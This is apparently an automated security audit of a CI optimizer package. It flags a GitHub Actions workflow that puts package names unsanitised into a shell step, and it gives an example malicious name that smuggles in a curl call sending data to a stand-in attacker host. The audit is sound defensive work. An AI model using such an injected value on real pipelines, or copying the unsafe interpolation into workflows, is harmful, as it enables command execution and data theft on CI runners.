monorepo-ci-optimizer
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): Vulnerable shell interpolation in GitHub Actions. The provided YAML workflow uses
${{ matrix.package }}directly in arunstep:pnpm --filter ${{ matrix.package }} test. Since the package list is derived from thenamefield ofpackage.jsonfiles within the repository, an attacker can submit a Pull Request containing a malicious package name (e.g.,evil-pkg; curl http://attacker.com/exfil) to execute arbitrary commands on the CI runner.\n- [PROMPT_INJECTION] (HIGH): Indirect injection surface (Category 8). The scriptscripts/get-affected.tsingests untrusted data from the workspace (package.jsonfiles) and passes it to the CI environment via::set-output. It lacks sanitization or validation of the extracted package names. Under Category 8 guidelines, this is rated HIGH because it involves processing external content with direct downstream write/execute capabilities in the CI pipeline.
Recommendations
- AI detected serious security threats
Audit Metadata